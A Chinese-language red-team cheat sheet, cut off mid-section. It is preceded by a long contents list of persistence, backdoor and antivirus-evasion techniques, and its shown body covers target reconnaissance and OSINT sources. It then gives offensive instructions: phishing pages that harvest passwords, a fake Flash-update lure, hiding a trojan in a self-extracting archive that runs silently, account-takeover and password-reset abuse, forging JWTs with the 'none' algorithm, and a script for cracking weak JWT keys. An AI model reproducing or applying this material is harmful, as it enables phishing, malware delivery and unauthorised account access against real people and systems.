- [DLL代理劫持右键](#dll代理劫持右键)
- [使用AMSI扫描接口维持权限](#使用amsi扫描接口维持权限)
- [DLL劫持计划任务](#dll劫持计划任务)
- [DLL注入](#dll注入)
- [Powershell](#powershell)
- [InjectProc](#injectproc)
- [通过控制面板加载项维持权限](#通过控制面板加载项维持权限)
- [通过自定义.net垃圾回收机制进行DLL注入](#通过自定义net垃圾回收机制进行DLL注入)
- [Windows FAX DLL Injection](#windows-fax-dll-injection)
- [DSRM+注册表ACL后门](#dsrm注册表acl后门)
- [DCShadow&SID History](#dcshadowsid-history)
- [DCSync后门](#dcsync后门)
- [Netsh Helper DLL](#netsh-helper-dll)
- [MSFvenom生成DLL](#msfvenom生成dll)
- [MSF+web_delivery](#msfweb_delivery)
- [MSF&Shellcode](#msfshellcode)
- [MSSQL后门](#mssql后门)
- [NSSM](#nssm)
- [添加签名](#添加签名)
- [Metsvc](#metsvc)
- [Persistence](#persistence)
- [HookPasswordChangeNotify](#hookpasswordchangenotify)
- [NPPSpy记录密码](#nppspy记录密码)
- [Password Filter DLL](#password-filter-dll)
- [WMIC事件订阅](#wmic事件订阅)
- [WMI-Persistence](#wmi-persistence)
- [Invoke-Tasksbackdoor](#invoke-tasksbackdoor)
- [Invoke-ADSBackdoor](#invoke-adsbackdoor)
- [ADS隐藏webshell](#ads隐藏webshell)
- [ADS&JavaScript](#adsjavascript)
- [Empire](#empire)
- [LNK后门](#lnk后门)
- [WMI](#wmi)
- [注入SSP被动收集密码](#注入ssp被动收集密码)
- [Mimikatz](#mimikatz)
- [Empire](#empire)
- [Powersploit](#powersploit)
- [基于域策略文件权限后门](#基于域策略文件权限后门)
- [Kerberoasting后门](#kerberoasting后门)
- [S4U2Self后门](#s4u2self后门)
- [受限委派后门](#受限委派后门)
- [Skeleton Key万能钥匙](#skeleton-key万能钥匙)
- [唯一IP访问](#唯一ip访问)
- [Linux cron后门](#linux-cron后门)
- [Strace记录ssh密码](#strace记录ssh密码)
- [SSHD后门](#sshd后门)
- [进程注入](#进程注入)
- [SSH wrapper后门](#ssh-wrapper后门)
- [SUID Shell](#suid-shell)
- [SSH公私钥登录](#ssh公私钥登录)
- [Reptile](#reptile)
- [Kbeast_rootkit](#kbeast_rootkit)
- [OpenSSH后门](#openssh后门)
- [IPTables端口复用](#iptables端口复用)
- [文件处理](#文件处理)
- [IIS_Bin_Backdoor](#iis_bin_backdoor)
- [IIS_NETDLL_Spy](#iis_netdll_spy)
- [IIS_RAID](#iis_raid)
- [JAVA Web Backdoor](#java-web-backdoor)
- [Tomcat JSP HideShell](#tomcat-jsp-hideshell)
- [Apache Module后门1](#apache-module后门1)
- [Apache Module后门2](#apache-module后门2)
- [Apache Module后门3](#apache-module后门3)
- [Nginx Lua后门](#nginx-lua后门)
- [PwnNginx](#pwnnginx)
- [渗透和红队tips](#渗透和红队tips)
- [父进程破坏](#父进程破坏)
- [loT高频率账户密码](#lot高频率账户密码)
- [Bypass mod_security](#bypass-mod_security)
- [查找git和svn的字典](#查找git和svn的字典)
- [Top 25 重定向dorks](#top-25-重定向dorks)
- [使用grep快速去除垃圾数据](#使用grep快速去除垃圾数据)
- [已泄露的密码整理出的字典](#已泄露的密码整理出的字典)
- [命令注入Bypass](#命令注入bypass)
- [查询是否存在heartbleed漏洞](#查询是否存在heartbleed漏洞)
- [远程解压文件](#远程解压文件)
- [Top25 ssrf dorks](#top25-ssrf-dorks)
- [使用SecurityTrails API查询子域名](#使用securitytrails-api查询子域名)
- [邮件地址payload](#邮件地址payload)
- [Web server日志分析命令](#web-server日志分析命令)
- [Bypass AMSI](#bypass-amsi)
- [Bypass AMSI 2](#bypass-amsi-2)
- [CVE-2020-5902](#cve-2020-5902)
- [一些可尝试绕过白名单的执行](#一些可尝试绕过白名单的执行)
- [绕过lsa protection](#绕过lsa-protection)
- [Pezor免杀](#pezor免杀)
- [动态调用进程注入逻辑](#动态调用进程注入逻辑)
- [在Windows Server 2016和2019中绕过Windows Defender](#在windows-server-2016和2019中绕过windows-defender)
- [内存中解码shellcode绕过av](#内存中解码shellcode绕过av)
- [cshot shellcode远程加载器](#cshot-shellcode远程加载器)
- [thinkphp渗透手段](#thinkphp渗透手段)
- [使用windows defender下载文件](#使用windows-defender下载文件)
- [Powershell脚本混淆绕过amsi和av](#powershell脚本混淆绕过amsi和av)
- [通过挂起EventLog服务线程禁用Windows事件日志](#通过挂起eventLog服务线程禁用windows事件日志)
- [dedecms](#dedecms)
- [dedecms前台重置任意管理员密码](#dedecms前台重置任意管理员密码)
- [Shiro rememberMe反序列化漏洞](#shiro-rememberMe反序列化漏洞)
- [Shiro Padding Oracle Attack](#shiro-padding-oracle-attack)
- [shiro权限绕过](#shiro权限绕过)
- [编辑器漏洞](#编辑器漏洞)
- [宝塔面板未授权访问phpmyadmin](#宝塔面板未授权访问phpmyadmin)
- [深信服](#深信服)
- [从LFI到RCE](#从lfi到rce)
# 信息收集
## Whois
站点注册人注册过的其他网站(对注册人、邮箱、电话的反查),对查到的站点的深入
## 网站IP
### 是否存在CDN
Ping、多地ping、国外ping
### Bypass cdn常规方式
子域名
https://dnsdb.io/zh-cn/
Ping根域名
Nslookup
Cloudflare的真实IP寻找
http://crimeflare.org:82/cfs.html
https://github.com/gwen001/pentest-tools/blob/master/cloudflare-origin-ip.py
查找老域名
查找关联域名
www.baidu.com
www.baidu.cn
www.baidu.org
www.baidu.xyz等等
信息泄露/配置文件
Phpinfo
网页源码
Svn
Github
Shodan/fofa/zoomeye
SSL证书记录
https://censys.io/
网站漏洞
Xss
Ssrf
命令执行
SQL注入(某种情况loadfile读取linux的ip配置文件,hosts文件等)
DNS记录,证书记录
设置xff/x-remote-ip/x-remote-addr为127.0.0.1/或ipv6地址
RSS订阅/邮件头
APP反编译搜索/截取APP的请求信息
修改hosts文件指向
## 域名历史IP
https://x.threatbook.cn/
## 网站架构/服务器指纹/CMS识别/容器
Whatweb
网页源代码
请求头/响应头
网站底部,顶部,左上角右上角
网站报错信息
http://www.yunsee.cn/
域名/install
Firefox插件Wappalyzer
CMS漏洞
定位版本对应已知漏洞检查
CMS未知漏洞挖掘
Web容器已知漏洞(解析漏洞这种)
显示网站使用的技术
https://builtwith.com/
中间件、组件
Weblogic、tomcat、zabbix、struts、axis等
https://github.com/FortyNorthSecurity/EyeWitness
## 子域名
老站、同样架构或同源码的子站
爆破,接口查询
https://phpinfo.me/domain/
https://d.chinacycc.com/index.php?m=Login&a=index
subDomainBrute、knockpy
OWA发现、dig adfs、dig mail
https://dns.bufferover.run/dns?q=baidu.com
http://api.hackertarget.com/reversedns/?q=target.com
## 网站使用的CMS的官方demo站
找不到demo就找源码开发者,加群什么的,结合社会工程学要个后台截图(对于一些后台目录复杂的cms),注意看网站上一些功能介绍的截图。
## SSL证书信息
https://crt.sh/?q=%25.target.com
https://censys.io/certificates?q=target.com
https://github.com/cheetz/sslScrape
## DNS历史解析记录
https://dnsdumpster.com/
https://censys.io/
https://securitytrails.com/
域传送漏洞检查
Dnsenum、fierce
http://ha.ckers.org/fierce/
$ ./fierce.pl -dns example.com
$ ./fierce.pl –dns example.com –wordlist myWordList.txt
>dig @ns.example.com example=.com AXFR
>nslookup -type=ns xxx.yyy.cn #查询解析某域名的DNS服务器
>nslookup #进入nslookup交互模式
>server dns.domian.com #指定dns服务器
>ls xxx.yyy.cn #列出域信息
## 同服站点情况
https://site.ip138.com/
火狐插件flagfox,配置单击指向bing查ip对应的域名
## 同样架构或源码的站
## 网站js
https://github.com/003random/getJS
https://github.com/Threezh1/JSFinder
或浏览器F12也可以看到加载的
敏感信息、可能存在漏洞的参数等信息
查看网页源代码,注释的一些信息,比如没有删掉的接口、前台没有的页面、越权、注入、js等
## 网站使用的第三方js
## 云信息
Aliyun、AWS、GCP、Azure等
查找可公开访问的实例
https://github.com/gwen001/s3-buckets-finder
https://github.com/nccgroup/aws-inventory
https://github.com/jordanpotti/AWSBucketDump
## APP反编译
url、js、osskey、api等信息查找
搜集到接口该怎么做
Fuzz常见参数
## C段/B段信息
Banner、是否存在目标的后台或其他入口/其他业务系统
## 工具
recon-ng,theharvester,maltego,exiftool等
https://www.spiderfoot.net/
https://github.com/smicallef/spiderfoot
## 端口对外开放情况
Masscan、scanport等
针对常见的那些端口的利用的常规方法
常见的未授权访问的服务如redis,mongodb等
## 目录扫描/爬虫(慎用)
## WAF情况识别
https://github.com/EnableSecurity/wafw00f
做好绕过策略的计划
## 随手测试
单引号
xx.jpg/.php
admin/123456
万能密码
Heartbleed漏洞
## 搜索引擎
Google自定义搜索引擎整合的300多个社交网站
https://cse.google.com/cse?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:iyxger-cwug&q=%22%22
Google自定义搜索引擎整合的文件共享网站
https://cse.google.com/cse/publicurl?key=AIzaSyB2lwQuNzUsRTH-49FA7od4dB_Xvu5DCvg&cx=001794496531944888666:hn5bcrszfhe&q=%22%22
领英用户提取
https://cse.google.com/cse?cx=001394533911082033616:tm5y1wqwmme
## Shodan/fofa/zoomeye
## Google dorks
Site,filetype,intitle,inurl,intext等
## 信息泄露
电话、邮箱,姓名
目录遍历
备份文件
(www.zip,xx.com.zip,www.xx.com.zip,wwwroot.zip)
.svn/.git/sql/robots/crossdomin.xml/DS_Store等
https://github.com/lijiejie/ds_store_exp
https://github.com/admintony/svnExploit
若是论坛ID=1的用户名一般为管理、或查看帖子信息、生成字典
网页上客服的QQ(先判断是企业的还是个人,用处有时不太大,看怎么用,搞个鱼叉什么的)
## 网页缓存
http://www.cachedpages.com/
## 图片反查
百度识图、googleimage、tineye
原图查询坐标
## 社交
QQ、weibo、支付宝、脉脉、领英、咸鱼、短视频、人人、贴吧、论坛
外网信息
有些人喜欢把自己的生活传到外网
推特、ins、fb等
## 手机号加入通讯录匹配各个APP用户信息
## 注册过的网站
https://www.reg007.com/
https://www.usersearch.org/
## 目标人员的兴趣
目标人员的兴趣 注册过的小众论坛,站点
针对此类站点的深入
收集到的用户名,电话等信息生成字典
## 邮箱搜集
https://hunter.io/
https://github.com/killswitch-GUI/SimplyEmail
## Exchange
https://github.com/dafthack/MailSniper
## 验证邮箱是否存在
https://tools.verifyemailaddress.io/
## 历史泄露过的资料等
库
https://haveibeenpwned.com/
https://github.com/kernelmachine/haveibeenpwned
## Github/Gitee等代码托管平台
https://github.com/dxa4481/truffleHog
https://github.com/lijiejie/GitHack
https://github.com/MiSecurity/x-patrol
https://github.com/az0ne/Github_Nuggests
https://github.com/mazen160/GithubCloner克隆用户的github
## 被入侵网址列表
http://zone-h.org/archive
wooyun镜像查找目标企业曾出现的漏洞
## GPS查询
https://www.opengps.cn/Default.aspx
## 网站URL提取
http://www.bulkdachecker.com/url-extractor/
## 蜜罐判断(参考一下即可)
https://honeyscore.shodan.io/
## 默认密码
https://default-password.info/
http://routerpasswords.com
## 如需注册
Sms
https://www.materialtools.com/
http://receivefreesms.com/
Email
https://10minutemail.net/
https://zh.mytrashmailer.com/
http://24mail.chacuo.net/enus
https://www.linshiyouxiang.net/
Fake id
https://www.fakenamegenerator.com/
http://www.haoweichi.com/
https://www.fakeaddressgenerator.com/
## 企业信息
天眼查、企查查、企业信用信息公示系统
企业邮箱收集,企业架构画像、人员统计、人员职责、部门、WiFi、常用部门密码、人员是否泄露过密码、人员平时爱逛的站点、OA/erp/crm/sso/mail/vpn等入口、网络安全设备(waf,ips,ids,router等统计)、内部使用的代码托管平台(gitlab、daocloud等),bug管理平台、服务器域名资产统计
# 入口点
## win10 安装kali(wsl)
Microsoft Store查找kali下载。
Powershell执行
>Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
源设置vim /etc/apt/source.list
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
>sudo su
>passwd root修改root密码
>apt-get update &apt-get upgrade 更新
>apt-get dist-upgrade
>apt-get clean
cmd>kali config --default-user root 设置默认启动用户为root
cmd>net stop/start LxssManager重启服务
>apt-get install metasploit-framework
>apt install kali-linux-full 安装完整kali工具集
## 水坑攻击
### XSS克隆钓鱼
保存js&css到服务器,登录action改为接受密码的文件action="./pass.php"
window.location.href=\"http://192.168.0.1\"\n";
?>
构造payload
php –S 0.0.0.0:8080 –t ./
### 伪造页面钓鱼
#### 1
https://github.com/r00tSe7en/Fake-flash.cn
添加xss平台模块
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert("您的FLASH版本过低,尝试升级后访问该页面!");
window.location.href="http://www.flash.com";
制作自解压捆绑
一个马.exe,一个正常exe,全选,winrar添加到压缩文件,选择创建自解压格式压缩文件,高级->自解压选项,设置解压路径,c:\windows\temp\,设置->解压后运行两个exe文件,模式全部隐藏,更新,解压并更新文件,覆盖所有文件。
ResourceHacker修改文件图标
#### 2
if(empty($_COOKIE['flash'])){
echo '';
setcookie("flash","true",time()+30*2400);
}
## 对外服务攻击
### Web
#### 前端/逻辑漏洞
##### 注册
任意用户注册
可爆破用户名
注入
XSS
##### 登录
爆破用户名,密码
注入
万能密码
Xss
Xss+Csrf
修改返回包信息,登入他人账户
修改cookie中的参数,如user,adminid等
##### 任意密码重置
1.重置一个账户,不发送验证码,设置验证码为空发送请求。
2.发送验证码,查看相应包
3.验证码生存期的爆破
4.修改相应包为成功的相应包
5.手工直接跳转到校验成功的界面
6.两个账户,重置别人密码时,替换验证码为自己正确的验证码
7.重置别人密码时,替换为自己的手机号
8.重置自己的成功时,同意浏览器重置别人的,不发验证码
9.替换用户名,ID,cookie,token参数等验证身份的参数
10.通过越权修改他人的找回信息如手机/邮箱来重置
##### 信息泄露
HTML源码、JS等查看信息搜集一章
##### 后台
登录参数修改为注册参数/reg、/register、/sign等
#### JWT攻击手法
https://jwt.io/#debugger-io
##### 未校验签名
将原JWT串解码后修改用户名等身份认证的地方,生成新token发送请求
##### 禁用哈希
Alg代表加密方式,修改用户名等身份认证的地方,把HS256设置为none生成token发送请求,使用python的pyjwt模块
jwt.encode({'user':'admin','arg1':'value1','arg2':'value2'},algorithm='none',key='')
##### 暴破弱密钥
>pip3 install pyjwt
>python3 crack.py
import jwt
import termcolor
jwt_str = R'token'
with open('/root/password.txt') as f:
for line in f:
key_ = line.strip()
try:
jwt.decode(jwt_str,verify=True,key=key_)
print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
break
except(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):
print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
except jwt.exceptions.InvalidSignatureError:
print('\r',' ' * 64, '\r\btry',key_,end='',flush=True)
continue
else:
print('\r','\bnot found.')
#### XSS
打COOKIE